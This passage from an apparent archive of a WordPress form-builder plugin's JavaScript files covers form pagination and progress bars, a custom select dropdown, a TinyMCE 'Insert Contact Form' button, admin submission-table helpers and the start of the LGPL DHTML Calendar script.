		id=jQuery(this).parent().attr('wdid');
		if_gmap_init('wdform_'+id, form_id);
		for(q=0; q<20; q++)
			if(jQuery("#wdform_"+id+"_element"+form_id)[0].getAttribute("long"+q))
			{
				w_long=parseFloat(document.getElementById('wdform_'+id+"_element"+form_id).getAttribute("long"+q));
				w_lat=parseFloat(document.getElementById('wdform_'+id+"_element"+form_id).getAttribute("lat"+q));
				w_info=parseFloat(document.getElementById('wdform_'+id+"_element"+form_id).getAttribute("info"+q));
				add_marker_on_map('wdform_'+id, q, w_long, w_lat, w_info, form_id,false);
		}

	}
); 

jQuery("#form" + form_id + " div[type='type_mark_map']").each(
	function()
	{
		id=jQuery(this).parent().attr('wdid');
		if_gmap_init('wdform_'+id, form_id);
		q=0;
			if(jQuery("#wdform_"+id+"_element"+form_id)[0].getAttribute("long"+q))
			{
				w_long=parseFloat(document.getElementById('wdform_'+id+"_element"+form_id).getAttribute("long"+q));
				w_lat=parseFloat(document.getElementById('wdform_'+id+"_element"+form_id).getAttribute("lat"+q));
				w_info=parseFloat(document.getElementById('wdform_'+id+"_element"+form_id).getAttribute("info"+q));
				add_marker_on_map('wdform_'+id, q, w_long, w_lat, w_info, form_id,true);
			}

	}
); 
  jQuery('.wdform-element-section').each(function() {
		if(!jQuery(this).parent()[0].style.width && parseInt(jQuery(this).width())!=0)
		{
	
			if(jQuery(this).css('display')=="table-cell")
			{
				if(jQuery(this).parent().attr('type')!="type_captcha")
					jQuery(this).parent().css('width', parseInt(jQuery(this).width()) + parseInt(jQuery(this).parent().find(jQuery(".wdform-label-section"))[0].style.width)+15);
				else
					jQuery(this).parent().css('width', (parseInt(jQuery(this).parent().find(jQuery(".captcha_input"))[0].style.width)*2+50) + parseInt(jQuery(this).parent().find(jQuery(".wdform-label-section"))[0].style.width)+15);
			}
		}
		
	});


}

function display_none_form_views_all(form_id)

{

	for(t=1; t<30; t++)

		if(document.getElementById(form_id+'form_view'+t))

			document.getElementById(form_id+'form_view'+t).parentNode.style.display="none";

}

function generate_page_bar(form_view, form_id, form_view_count, form_view_max)	

{	

		if(document.getElementById(form_id+'pages').getAttribute('type')=='steps')

				make_page_steps_front(form_view, form_id, form_view_count, form_view_max);

		else

			if(document.getElementById(form_id+'pages').getAttribute('type')=='percentage')

				make_page_percentage_front(form_view, form_id, form_view_count, form_view_max);

			else

				make_page_none_front(form_id);

		



		

		

		if(document.getElementById(form_id+'pages').getAttribute('type')=='show_numbers')		

		{		

			td = document.getElementById(form_id+'page_numbers'+form_view);

			if(td)	

			{	

				destroyChildren(td);

				k=0;

				for(j=1; j<=form_view_max; j++)

				{

					if(document.getElementById(form_id+'form_view'+j))

					{

						k++;		

						if(j==form_view)

							page_number=k;

					}

				}

				

				var cur = document.createElement('span');

					cur.setAttribute("class", "page_numbers");

					cur.innerHTML=page_number+'/'+k;

				

				td.appendChild(cur);

				}

		}

		else

		{	

			td = document.getElementById(form_id+'page_numbers'+form_view);

			if(td)	

			{	

				destroyChildren(document.getElementById(form_id+'page_numbers'+form_view));

			}

		}		

	}

function make_page_steps_front(form_view, form_id, form_view_count, form_view_max)

{

	destroyChildren(document.getElementById(form_id+'pages'));

	show_title			=(document.getElementById(form_id+'pages').getAttribute('show_title')=='true');

	next_checkable		=(document.getElementById(form_id+'form_view'+form_view).getAttribute('next_checkable')=='true');

	previous_checkable	=(document.getElementById(form_id+'form_view'+form_view).getAttribute('previous_checkable')=='true');

	

	k=0;

	for(j=1; j<=form_view_max; j++)

	{	

		if(document.getElementById(form_id+'form_view'+j))

			{

			if(document.getElementById(form_id+'form_view'+j).getAttribute('page_title'))

				w_pages=document.getElementById(form_id+'form_view'+j).getAttribute('page_title');

			else

				w_pages="";

			k++;

			

			page_number = document.createElement('span');

			page_number.setAttribute('id','page_'+j);

			if(j<form_view)

				if(previous_checkable)

					page_number.setAttribute('onClick','if(check'+form_id+'('+form_view+')) generate_page_nav("'+j+'", "'+form_id+'", "'+form_view_count+'", "'+form_view_max+'")');

				else

					page_number.setAttribute('onClick','generate_page_nav("'+j+'", "'+form_id+'", "'+form_view_count+'", "'+form_view_max+'")');

				

				

			if(j>form_view)

				if(next_checkable)

					page_number.setAttribute('onClick','if(check'+form_id+'('+form_view+')) generate_page_nav("'+j+'", "'+form_id+'", "'+form_view_count+'", "'+form_view_max+'")');

				else			

					page_number.setAttribute('onClick','generate_page_nav("'+j+'", "'+form_id+'", "'+form_view_count+'", "'+form_view_max+'")');

			

			

			if(j==form_view)

				page_number.setAttribute('class',"page_active");

			else

				page_number.setAttribute('class',"page_deactive");

			if(show_title)

			{

				page_number.innerHTML=w_pages;

			}

			else

				page_number.innerHTML=k;

			

			document.getElementById(form_id+'pages').appendChild(page_number);

		}

	}



}

function make_page_percentage_front(form_view, form_id, form_view_count, form_view_max)
{
	destroyChildren(document.getElementById(form_id+'pages'));
	show_title=(document.getElementById(form_id+'pages').getAttribute('show_title')=='true');
    var div_parent = document.createElement('div');
       	div_parent.setAttribute("class", "page_percentage_deactive");

    var div = document.createElement('div');
       	div.setAttribute("id", "div_percentage");
       	div.setAttribute("class", "page_percentage_active");
       	div.setAttribute("align", "right");
		
    var div_arrow = document.createElement('div');
       	div_arrow.setAttribute("class", "wdform_percentage_arrow");
		
	var b = document.createElement('b');
       	b.setAttribute("class", "wdform_percentage_text");

	div.appendChild(b);
	
	k=0;
	cur_page_title='';
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById(form_id+'form_view'+j))
			{
			if(document.getElementById(form_id+'form_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById(form_id+'form_view'+j).getAttribute('page_title');
			else
				w_pages="";
			k++;
				
			if(j==form_view)
			{
				if(show_title)
				{ 
					var cur_page_title = document.createElement('div');
						cur_page_title.innerHTML=w_pages;
						
					cur_page_title.innerHTML=w_pages;										
					cur_page_title.setAttribute("class", "wdform_percentage_title");
				}
				page_number=k;

			}
		}
	}
	b.innerHTML=Math.round(((page_number-1)/k)*100)+'%';
	div.style.width=((page_number-1)/k)*100+'%';
	if(page_number==1)
		div_arrow.style.display='none';
	div_parent.appendChild(div);
	div_parent.appendChild(div_arrow);
	if(cur_page_title)
		div_parent.appendChild(cur_page_title);
	document.getElementById(form_id+'pages').appendChild(div_parent);
}

function make_page_none_front(form_id)
{
	destroyChildren(document.getElementById(form_id+'pages'));
}

function make_pagebreak_button(next_or_previous,title,type, class_, checkable, id, form_id, form_view_count, form_view_max)
{
	switch(type)
	{
		case 'text': {	

			var element = document.createElement('div');

				element.setAttribute('id', "page_"+next_or_previous+"_"+id);

				element.setAttribute('class', class_);

				if(checkable=="true")

					element.setAttribute('onClick', "if(check"+form_id+"("+id+")) page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");

				else

					element.setAttribute('onClick', "page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");

				element.innerHTML=title;

				

			return element;

			

			break;

		}

		case 'img':{ 			

		

			var element = document.createElement('img');

				element.setAttribute('id', "page_"+next_or_previous+"_"+id);

				element.setAttribute('class', class_);

				if(checkable=="true")

					element.setAttribute('onClick', "if(check"+form_id+"("+id+")) page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");

				else

					element.setAttribute('onClick', "page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");

				if(title.indexOf("http")==0)

				{

					element.src=title;

				}

				else

					element.src=fm_objectL10n.plugin_url+'/'+title;

				

			return element;

			

			break;

		}

	}

}

function form_maker_findPos(obj) {
  var curtop = 0;
  if (obj.offsetParent) {
    do {
        curtop += obj.offsetTop;
    } while (obj = obj.offsetParent);
  return [curtop];
  }
}

function page_previous(id, form_id, form_view_count, form_view_max)

{

	form_view_elemet=document.getElementById(form_id+'form_view'+id);

	if(form_view_elemet.parentNode.previousSibling && form_view_elemet.parentNode.previousSibling.previousSibling)

	{

	if(form_view_elemet.parentNode.previousSibling.tagName=="DIV")

		table=form_view_elemet.parentNode.previousSibling;

	else

		table=form_view_elemet.parentNode.previousSibling.previousSibling;

	}

	if(!table.firstChild.tagName)

		table.removeChild(table.firstChild);



	generate_page_nav(table.firstChild.id.replace(form_id+'form_view', ""),form_id, form_view_count, form_view_max);

	window.scroll(0, form_maker_findPos(document.getElementById("form" + form_id)));

}



function page_next(id, form_id, form_view_count, form_view_max)

{

	form_view_elemet=document.getElementById(form_id+'form_view'+id);

	if(form_view_elemet.parentNode.nextSibling)

	{

	if(form_view_elemet.parentNode.nextSibling.tagName=="DIV")

		table=form_view_elemet.parentNode.nextSibling;

	else

		table=form_view_elemet.parentNode.nextSibling.nextSibling;

	}

	if(!table.firstChild.tagName)

		table.removeChild(table.firstChild);



	generate_page_nav(table.firstChild.id.replace(form_id+'form_view', ""), form_id, form_view_count, form_view_max);

	window.scroll(0, form_maker_findPos(document.getElementById("form" + form_id)));

}


function getfileextension(filename, exten) 
{ 
	if( filename.length == 0 ) 
	return true; 
	var dot = filename.lastIndexOf("."); 
	var extension = filename.substr(dot+1,filename.length); 
	exten=exten.split(',');
	for(var j=0 ; j<exten.length; j++)
	{
		exten[j]=exten[j].replace(/\./g,'');
		exten[j]=exten[j].replace(/ /g,'');
		if(extension.toLowerCase()==exten[j].toLowerCase())
		return true;
	}
	return false; 
} 

function reselect(select, addclass) {
    addclass = typeof(addclass) != 'undefined' ? addclass : '';
    jQuery(select).wrap('<div class="sel-wrap ' + addclass + '"/>');
    var sel_options = '';
    var selected_option = false;
    jQuery(select).children('option').each(function() {
        if(jQuery(this).is(':selected')){
            selected_option = jQuery(this).index();
        }
        sel_options = sel_options + '<div class="sel-option" value="' + jQuery(this).val() + '">' + jQuery(this).html() + '</div>';

    });
	
	w=jQuery(select)[0].style.width;
	
	if(w=='100%')
		w='100%';
	else
		w=(jQuery(select).width()+32)+'px';

	var sel_imul = '<div class="sel-imul" style="width:'+w+'">\
                <div class="sel-selected">\
                    <div class="selected-text">' + jQuery(select).children('option').eq(selected_option).html() + '</div>\
                    <div class="sel-arraw"></div>\
                </div>\
                <div class="sel-options">' + sel_options + '</div>\
            </div>';
			
	jQuery(select).addClass('no-width');
    jQuery(select).before(sel_imul);
}

jQuery(document).on('change','.wdform-element-section select', function() {


var tektext = jQuery(this).children("option:selected").text();
jQuery(this).parent('.sel-wrap ').children('.sel-imul').children('.sel-selected').children('.selected-text').html(tektext);
jQuery(this).parent('.sel-wrap ').children('.sel-imul').children('.sel-options').children('.sel-option').removeClass('sel-ed');
jQuery(this).addClass('sel-ed');

jQuery(this).parent('.sel-wrap ').children('.sel-imul').children('.sel-options').each(function() {
if (jQuery(this).html() == tektext) {

jQuery(this).addClass('sel-ed');
}
});

});

jQuery(document).on('click','.sel-imul', function() {

    jQuery('.sel-imul').removeClass('act');
    jQuery(this).addClass('act');
    if (jQuery(this).children('.sel-options').is(':visible')) {
        jQuery('.sel-options').hide();
    }
    else {
        jQuery('.sel-options').hide();
        jQuery(this).children('.sel-options').show();
		jQuery(this).children('.sel-options').css('width',jQuery(this).width());
    }
});

jQuery(document).on('click','.sel-option', function() {

    var tektext = jQuery(this).html();
    jQuery(this).parent('.sel-options').parent('.sel-imul').children('.sel-selected').children('.selected-text').html(tektext);

    jQuery(this).parent('.sel-options').children('.sel-option').removeClass('sel-ed');
    jQuery(this).addClass('sel-ed');

    var tekval = jQuery(this).attr('value');
	
    tekval = typeof(tekval) != 'undefined' ? tekval : tektext;
  jQuery(this).parent('.sel-options').parent('.sel-imul').parent('.sel-wrap').children('select').children('option').removeAttr('selected').each(function() {
        if (jQuery(this).html() == tektext) {
            
            jQuery(this).attr('selected', 'select');
        }
    });
	
	jQuery(this).parent('.sel-options').parent('.sel-imul').parent('.sel-wrap').children('select').change();
});

var selenter = false;
jQuery(document).on('mouseenter','.sel-imul', function() {
    selenter = true;
});

jQuery(document).on('mouseleave','.sel-imul', function() {
    selenter = false;
});

jQuery(document).click(function() {
    if (!selenter) {
        jQuery('.sel-options').hide();
        jQuery('.sel-imul').removeClass('act');
    }
});

function remove_whitespace(node)
{
var ttt;
	for (ttt=0; ttt < node.childNodes.length; ttt++)
	{
        if( node.childNodes[ttt] && node.childNodes[ttt].nodeType == '3' && !/\S/.test(  node.childNodes[ttt].nodeValue ))
		{
			
			node.removeChild(node.childNodes[ttt]);
			 ttt--;
		}
		else
		{
			if(node.childNodes[ttt].childNodes.length)
				remove_whitespace(node.childNodes[ttt]);
		}
	}
	return
}

js/form_maker_editor_button.js000060400000001310152434416630012600 0ustar00(function() {
  tinymce.create('tinymce.plugins.fmc_form_mce', {
    init : function(ed, url) {
      ed.addCommand('mcefmc_form_mce', function() {
        ed.windowManager.open({
          file : form_maker_admin_ajax_cfm,
					width : 550 + ed.getLang('fmc_form_mce.delta_width', 0),
					height : 300 + ed.getLang('fmc_form_mce.delta_height', 0),
					inline : 1
				}, {
            fmc_plugin_url : url // Plugin absolute URL
				});
			});
      ed.addButton('fmc_form_mce', {
        title : 'Insert Contact Form',
        cmd : 'mcefmc_form_mce',
        image: url + '/images/form_maker_edit_but.png'
      });
    }
  });
  tinymce.PluginManager.add('fmc_form_mce', tinymce.plugins.fmc_form_mce);
})();js/form_maker_submissions.js000060400000006146152434416630012311 0ustar00function tableOrdering(order, dir, task) {
  var form = document.admin_form;
  form.filter_order2.value = order;
  form.filter_order_Dir2.value = dir;
  submitform(task);
}

function ordering(name, as_or_desc) {
  document.getElementById('asc_or_desc').value = as_or_desc;
  document.getElementById('order_by').value = name;
  document.getElementById('admin_form').submit();
}

function renderColumns() {
  allTags = document.getElementsByTagName('*');
  for (curTag in allTags) {
    if (typeof(allTags[curTag].className) != "undefined") {
      if (allTags[curTag].className.indexOf('_fc') > 0) {
        curLabel = allTags[curTag].className.replace('_fc', '');
        curLabel = curLabel.replace('table_large_col ', '');
        if (document.forms.admin_form.hide_label_list.value.indexOf('@' + curLabel + '@') >= 0) {
          allTags[curTag].style.display = 'none';
        }
        else {
          allTags[curTag].style.display = '';
        }
      }
    }
    if (typeof(allTags[curTag].id) != "undefined") {
      if (allTags[curTag].id.indexOf('_fc') > 0) {
        curLabel = allTags[curTag].id.replace('_fc','');
        if (document.forms.admin_form.hide_label_list.value.indexOf('@' + curLabel + '@') >= 0) {
          allTags[curTag].style.display = 'none';
        }
        else {
          allTags[curTag].style.display = '';
        }
      }
    }
  }
}

function clickLabChB(label, ChB) { 
  document.forms.admin_form.hide_label_list.value = document.forms.admin_form.hide_label_list.value.replace('@' + label + '@', '');
  if (document.forms.admin_form.hide_label_list.value == '') {
    document.getElementById('ChBAll').checked = true;
  }
  if (!(ChB.checked)) {
    document.forms.admin_form.hide_label_list.value += '@' + label + '@';
    document.getElementById('ChBAll').checked = false;
  }
  renderColumns();
}

function toggleChBDiv(flag) { 
  if (flag) {
    /* sizes = window.getSize().size;*/
    var width = jQuery(window).width();
    var height = jQuery(window).height();
    document.getElementById("sbox-overlay").style.width = width + "px";
    document.getElementById("sbox-overlay").style.height = height + "px";
    document.getElementById("ChBDiv").style.left = Math.floor((width - 350) / 2) + "px";

    document.getElementById("ChBDiv").style.display = "block";
    document.getElementById("sbox-overlay").style.display = "block";
  }
  else {
    document.getElementById("ChBDiv").style.display = "none";
    document.getElementById("sbox-overlay").style.display = "none";
  }
}

function submit_del(href_in) {
  document.getElementById('admin_form').action = href_in;
  document.getElementById('admin_form').submit();
}

function submitbutton(pressbutton) {
  var form = document.adminForm;
  if (pressbutton == 'cancel_theme') {
    submitform(pressbutton);
    return;
  }
  if (document.getElementById('title').value == '') {
    alert('The theme must have a title.')
    return;
  }
  submitform(pressbutton);
}

function submitform(pressbutton) {
  document.getElementById('adminForm').action = document.getElementById('adminForm').action + "&task=" + pressbutton;
  document.getElementById('adminForm').submit();
}
js/calendar/calendar.js000060400000107314152434416630011052 0ustar00/*  Copyright Mihai Bazon, 2002-2005  |  www.bazon.net/mishoo
 * -----------------------------------------------------------
 *
 * The DHTML Calendar, version 1.0 "It is happening again"
 *
 * Details and latest version at:
 * www.dynarch.com/projects/calendar
 *
 * This script is developed by Dynarch.com.  Visit us at www.dynarch.com.
 *
 * This script is distributed under the GNU Lesser General Public License.
 * Read the entire license text here: http://www.gnu.org/licenses/lgpl.html
 */
 Calendar=function(firstDayOfWeek,dateStr,onSelected,onClose){
Calendar._DN = new Array ("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday");Calendar._SDN = new Array ("Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"); Calendar._FD = 0;	Calendar._MN = new Array ("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December");	Calendar._SMN = new Array ("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec");Calendar._TT = {};Calendar._TT["INFO"] = "About the Calendar";
 		Calendar._TT["ABOUT"] =
 "DHTML Date/Time Selector\n" +
 "(c) dynarch.com 2002-2005 / Author: Mihai Bazon\n" +
"For latest version visit: http://www.dynarch.com/projects/calendar/\n" +
"Distributed under GNU LGPL.  See http://gnu.org/licenses/lgpl.html for details." +
"\n\n" +
"Date selection:\n" +
"- Use the \xab, \xbb buttons to select year\n" +
"- Use the " + String.fromCharCode(0x2039) + ", " + String.fromCharCode(0x203a) + " buttons to select month\n" +
"- Hold mouse button on any of the above buttons for faster selection.";
Calendar._TT["ABOUT_TIME"] = "\n\n" +
"Time selection:\n" +
"- Click on any of the time parts to increase it\n" +
"- or Shift-click to decrease it\n" +
"- or click and drag for faster selection.";

		Calendar._TT["PREV_YEAR"] = "Click to move to the previous year. Click and hold for a list of years.";Calendar._TT["PREV_MONTH"] = "Click to move to the previous month. Click and hold for a list of the months.";	Calendar._TT["GO_TODAY"] = "Go to today";Calendar._TT["NEXT_MONTH"] = "Click to move to the next month. Click and hold for a list of the months.";Calendar._TT["NEXT_YEAR"] = "Click to move to the next year. Click and hold for a list of years.";Calendar._TT["SEL_DATE"] = "Select a date.";Calendar._TT["DRAG_TO_MOVE"] = "Drag to move";Calendar._TT["PART_TODAY"] = " (Today)";Calendar._TT["DAY_FIRST"] = "Display %s first";Calendar._TT["WEEKEND"] = "0,6";Calendar._TT["CLOSE"] = "Close";Calendar._TT["TODAY"] = "Today";Calendar._TT["TIME_PART"] = "(Shift-)Click or Drag to change the value.";Calendar._TT["DEF_DATE_FORMAT"] = "%Y-%m-%d"; Calendar._TT["TT_DATE_FORMAT"] = "%A, %B %e";Calendar._TT["WK"] = "wk";Calendar._TT["TIME"] = "Time:";
	 
	 
	 
	 this.activeDiv=null;this.currentDateEl=null;this.getDateStatus=null;this.getDateToolTip=null;this.getDateText=null;this.timeout=null;this.onSelected=onSelected||null;this.onClose=onClose||null;this.dragging=false;this.hidden=false;this.minYear=1970;this.maxYear=2050;this.dateFormat=Calendar._TT["DEF_DATE_FORMAT"];this.ttDateFormat=Calendar._TT["TT_DATE_FORMAT"];this.isPopup=true;this.weekNumbers=true;this.firstDayOfWeek=typeof firstDayOfWeek=="number"?firstDayOfWeek:Calendar._FD;this.showsOtherMonths=false;this.dateStr=dateStr;this.ar_days=null;this.showsTime=false;this.time24=true;this.yearStep=2;this.hiliteToday=true;this.multiple=null;this.table=null;this.element=null;this.tbody=null;this.firstdayname=null;this.monthsCombo=null;this.yearsCombo=null;this.hilitedMonth=null;this.activeMonth=null;this.hilitedYear=null;this.activeYear=null;this.dateClicked=false;if(typeof Calendar._SDN=="undefined"){if(typeof Calendar._SDN_len=="undefined")Calendar._SDN_len=3;var ar=new Array();for(var i=8;i>0;){ar[--i]=Calendar._DN[i].substr(0,Calendar._SDN_len);}Calendar._SDN=ar;if(typeof Calendar._SMN_len=="undefined")Calendar._SMN_len=3;ar=new Array();for(var i=12;i>0;){ar[--i]=Calendar._MN[i].substr(0,Calendar._SMN_len);}Calendar._SMN=ar;}};Calendar._C=null;Calendar.is_ie=(/msie/i.test(navigator.userAgent)&&!/opera/i.test(navigator.userAgent));Calendar.is_ie5=(Calendar.is_ie&&/msie 5\.0/i.test(navigator.userAgent));Calendar.is_opera=/opera/i.test(navigator.userAgent);Calendar.is_khtml=/Konqueror|Safari|KHTML/i.test(navigator.userAgent);Calendar.getAbsolutePos=function(el){var SL=0,ST=0;var is_div=/^div$/i.test(el.tagName);if(is_div&&el.scrollLeft)SL=el.scrollLeft;if(is_div&&el.scrollTop)ST=el.scrollTop;var r={x:el.offsetLeft-SL,y:el.offsetTop-ST};if(el.offsetParent){var tmp=this.getAbsolutePos(el.offsetParent);r.x+=tmp.x;r.y+=tmp.y;}return r;};Calendar.isRelated=function(el,evt){var related=evt.relatedTarget;if(!related){var type=evt.type;if(type=="mouseover"){related=evt.fromElement;}else if(type=="mouseout"){related=evt.toElement;}}while(related){if(related==el){return true;}related=related.parentNode;}return false;};Calendar.removeClass=function(el,className){if(!(el&&el.className)){return;}var cls=el.className.split(" ");var ar=new Array();for(var i=cls.length;i>0;){if(cls[--i]!=className){ar[ar.length]=cls[i];}}el.className=ar.join(" ");};Calendar.addClass=function(el,className){Calendar.removeClass(el,className);el.className+=" "+className;};Calendar.getElement=function(ev){var f=Calendar.is_ie?window.event.srcElement:ev.currentTarget;while(f.nodeType!=1||/^div$/i.test(f.tagName))f=f.parentNode;return f;};Calendar.getTargetElement=function(ev){var f=Calendar.is_ie?window.event.srcElement:ev.target;while(f.nodeType!=1)f=f.parentNode;return f;};Calendar.stopEvent=function(ev){ev||(ev=window.event);if(Calendar.is_ie){ev.cancelBubble=true;ev.returnValue=false;}else{ev.preventDefault();ev.stopPropagation();}return false;};Calendar.addEvent=function(el,evname,func){if(el.attachEvent){el.attachEvent("on"+evname,func);}else if(el.addEventListener){el.addEventListener(evname,func,true);}else{el["on"+evname]=func;}};Calendar.removeEvent=function(el,evname,func){if(el.detachEvent){el.detachEvent("on"+evname,func);}else if(el.removeEventListener){el.removeEventListener(evname,func,true);}else{el["on"+evname]=null;}};Calendar.createElement=function(type,parent){var el=null;if(document.createElementNS){el=document.createElementNS("http://www.w3.org/1999/xhtml",type);}else{el=document.createElement(type);}if(typeof parent!="undefined"){parent.appendChild(el);}return el;};Calendar._add_evs=function(el){with(Calendar){addEvent(el,"mouseover",dayMouseOver);addEvent(el,"mousedown",dayMouseDown);addEvent(el,"mouseout",dayMouseOut);if(is_ie){addEvent(el,"dblclick",dayMouseDblClick);el.setAttribute("unselectable",true);}}};Calendar.findMonth=function(el){if(typeof el.month!="undefined"){return el;}else if(typeof el.parentNode.month!="undefined"){return el.parentNode;}return null;};Calendar.findYear=function(el){if(typeof el.year!="undefined"){return el;}else if(typeof el.parentNode.year!="undefined"){return el.parentNode;}return null;};Calendar.showMonthsCombo=function(){var cal=Calendar._C;if(!cal){return false;}var cal=cal;var cd=cal.activeDiv;var mc=cal.monthsCombo;if(cal.hilitedMonth){Calendar.removeClass(cal.hilitedMonth,"hilite");}if(cal.activeMonth){Calendar.removeClass(cal.activeMonth,"active");}var mon=cal.monthsCombo.getElementsByTagName("div")[cal.date.getMonth()];Calendar.addClass(mon,"active");cal.activeMonth=mon;var s=mc.style;s.display="block";if(cd.navtype<0)s.left=cd.offsetLeft+"px";else{var mcw=mc.offsetWidth;if(typeof mcw=="undefined")mcw=50;s.left=(cd.offsetLeft+cd.offsetWidth-mcw)+"px";}s.top=(cd.offsetTop+cd.offsetHeight)+"px";};Calendar.showYearsCombo=function(fwd){var cal=Calendar._C;if(!cal){return false;}var cal=cal;var cd=cal.activeDiv;var yc=cal.yearsCombo;if(cal.hilitedYear){Calendar.removeClass(cal.hilitedYear,"hilite");}if(cal.activeYear){Calendar.removeClass(cal.activeYear,"active");}cal.activeYear=null;var Y=cal.date.getFullYear()+(fwd?1:-1);var yr=yc.firstChild;var show=false;for(var i=12;i>0;--i){if(Y>=cal.minYear&&Y<=cal.maxYear){yr.innerHTML=Y;yr.year=Y;yr.style.display="block";show=true;}else{yr.style.display="none";}yr=yr.nextSibling;Y+=fwd?cal.yearStep:-cal.yearStep;}if(show){var s=yc.style;s.display="block";if(cd.navtype<0)s.left=cd.offsetLeft+"px";else{var ycw=yc.offsetWidth;if(typeof ycw=="undefined")ycw=50;s.left=(cd.offsetLeft+cd.offsetWidth-ycw)+"px";}s.top=(cd.offsetTop+cd.offsetHeight)+"px";}};Calendar.tableMouseUp=function(ev){var cal=Calendar._C;if(!cal){return false;}if(cal.timeout){clearTimeout(cal.timeout);}var el=cal.activeDiv;if(!el){return false;}var target=Calendar.getTargetElement(ev);ev||(ev=window.event);Calendar.removeClass(el,"active");if(target==el||target.parentNode==el){Calendar.cellClick(el,ev);}var mon=Calendar.findMonth(target);var date=null;if(mon){date=new Date(cal.date);if(mon.month!=date.getMonth()){date.setMonth(mon.month);cal.setDate(date);cal.dateClicked=false;cal.callHandler();}}else{var year=Calendar.findYear(target);if(year){date=new Date(cal.date);if(year.year!=date.getFullYear()){date.setFullYear(year.year);cal.setDate(date);cal.dateClicked=false;cal.callHandler();}}}with(Calendar){removeEvent(document,"mouseup",tableMouseUp);removeEvent(document,"mouseover",tableMouseOver);removeEvent(document,"mousemove",tableMouseOver);cal._hideCombos();_C=null;return stopEvent(ev);}};Calendar.tableMouseOver=function(ev){var cal=Calendar._C;if(!cal){return;}var el=cal.activeDiv;var target=Calendar.getTargetElement(ev);if(target==el||target.parentNode==el){Calendar.addClass(el,"hilite active");Calendar.addClass(el.parentNode,"rowhilite");}else{if(typeof el.navtype=="undefined"||(el.navtype!=50&&(el.navtype==0||Math.abs(el.navtype)>2)))Calendar.removeClass(el,"active");Calendar.removeClass(el,"hilite");Calendar.removeClass(el.parentNode,"rowhilite");}ev||(ev=window.event);if(el.navtype==50&&target!=el){var pos=Calendar.getAbsolutePos(el);var w=el.offsetWidth;var x=ev.clientX;var dx;var decrease=true;if(x>pos.x+w){dx=x-pos.x-w;decrease=false;}else dx=pos.x-x;if(dx<0)dx=0;var range=el._range;var current=el._current;var count=Math.floor(dx/10)%range.length;for(var i=range.length;--i>=0;)if(range[i]==current)break;while(count-->0)if(decrease){if(--i<0)i=range.length-1;}else if(++i>=range.length)i=0;var newval=range[i];el.innerHTML=newval;cal.onUpdateTime();}var mon=Calendar.findMonth(target);if(mon){if(mon.month!=cal.date.getMonth()){if(cal.hilitedMonth){Calendar.removeClass(cal.hilitedMonth,"hilite");}Calendar.addClass(mon,"hilite");cal.hilitedMonth=mon;}else if(cal.hilitedMonth){Calendar.removeClass(cal.hilitedMonth,"hilite");}}else{if(cal.hilitedMonth){Calendar.removeClass(cal.hilitedMonth,"hilite");}var year=Calendar.findYear(target);if(year){if(year.year!=cal.date.getFullYear()){if(cal.hilitedYear){Calendar.removeClass(cal.hilitedYear,"hilite");}Calendar.addClass(year,"hilite");cal.hilitedYear=year;}else if(cal.hilitedYear){Calendar.removeClass(cal.hilitedYear,"hilite");}}else if(cal.hilitedYear){Calendar.removeClass(cal.hilitedYear,"hilite");}}return Calendar.stopEvent(ev);};Calendar.tableMouseDown=function(ev){if(Calendar.getTargetElement(ev)==Calendar.getElement(ev)){return Calendar.stopEvent(ev);}};Calendar.calDragIt=function(ev){var cal=Calendar._C;if(!(cal&&cal.dragging)){return false;}var posX;var posY;if(Calendar.is_ie){posY=window.event.clientY+document.body.scrollTop;posX=window.event.clientX+document.body.scrollLeft;}else{posX=ev.pageX;posY=ev.pageY;}cal.hideShowCovered();var st=cal.element.style;st.left=(posX-cal.xOffs)+"px";st.top=(posY-cal.yOffs)+"px";return Calendar.stopEvent(ev);};Calendar.calDragEnd=function(ev){var cal=Calendar._C;if(!cal){return false;}cal.dragging=false;with(Calendar){removeEvent(document,"mousemove",calDragIt);removeEvent(document,"mouseup",calDragEnd);tableMouseUp(ev);}cal.hideShowCovered();};Calendar.dayMouseDown=function(ev){var el=Calendar.getElement(ev);if(el.disabled){return false;}var cal=el.calendar;cal.activeDiv=el;Calendar._C=cal;if(el.navtype!=300)with(Calendar){if(el.navtype==50){el._current=el.innerHTML;addEvent(document,"mousemove",tableMouseOver);}else addEvent(document,Calendar.is_ie5?"mousemove":"mouseover",tableMouseOver);addClass(el,"hilite active");addEvent(document,"mouseup",tableMouseUp);}else if(cal.isPopup){cal._dragStart(ev);}if(el.navtype==-1||el.navtype==1){if(cal.timeout)clearTimeout(cal.timeout);cal.timeout=setTimeout("Calendar.showMonthsCombo()",250);}else if(el.navtype==-2||el.navtype==2){if(cal.timeout)clearTimeout(cal.timeout);cal.timeout=setTimeout((el.navtype>0)?"Calendar.showYearsCombo(true)":"Calendar.showYearsCombo(false)",250);}else{cal.timeout=null;}return Calendar.stopEvent(ev);};Calendar.dayMouseDblClick=function(ev){Calendar.cellClick(Calendar.getElement(ev),ev||window.event);if(Calendar.is_ie){document.selection.empty();}};Calendar.dayMouseOver=function(ev){var el=Calendar.getElement(ev);if(Calendar.isRelated(el,ev)||Calendar._C||el.disabled){return false;}if(el.ttip){if(el.ttip.substr(0,1)=="_"){el.ttip=el.caldate.print(el.calendar.ttDateFormat)+el.ttip.substr(1);}el.calendar.tooltips.innerHTML=el.ttip;}if(el.navtype!=300){Calendar.addClass(el,"hilite");if(el.caldate){Calendar.addClass(el.parentNode,"rowhilite");}}return Calendar.stopEvent(ev);};Calendar.dayMouseOut=function(ev){with(Calendar){var el=getElement(ev);if(isRelated(el,ev)||_C||el.disabled)return false;removeClass(el,"hilite");if(el.caldate)removeClass(el.parentNode,"rowhilite");if(el.calendar)el.calendar.tooltips.innerHTML=_TT["SEL_DATE"];return stopEvent(ev);}};Calendar.cellClick=function(el,ev){var cal=el.calendar;var closing=false;var newdate=false;var date=null;if(typeof 